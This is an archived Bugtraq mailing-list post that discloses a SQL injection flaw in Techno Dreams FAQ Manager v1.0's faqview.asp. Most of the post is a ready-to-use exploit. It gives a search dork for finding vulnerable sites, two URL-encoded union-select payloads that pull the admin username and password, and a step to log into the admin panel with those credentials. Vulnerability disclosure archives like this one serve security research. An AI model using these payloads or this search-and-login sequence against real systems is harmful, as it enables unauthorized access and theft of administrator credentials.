| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 17 Sep 2006 19:04:24 -0000 From: ajannhwt@...mail.com To: bugtraq@...urityfocus.com Subject: Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability Vulnerability Report ******************************************************************************* # Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability # Author : ajann # Dork : faqview.asp?key # Script Page : http://www.t-dreams.com # Exploit; ******************************************************************************* ###http://[target]/[path]/faqview.asp?key=[SQL HERE] Example: //faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin //faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin With admin username and password take it,after join to login page: ../[path]/admin/ # ajann,Turkey # ... # Im not Hacker!
Powered by blists - more mailing lists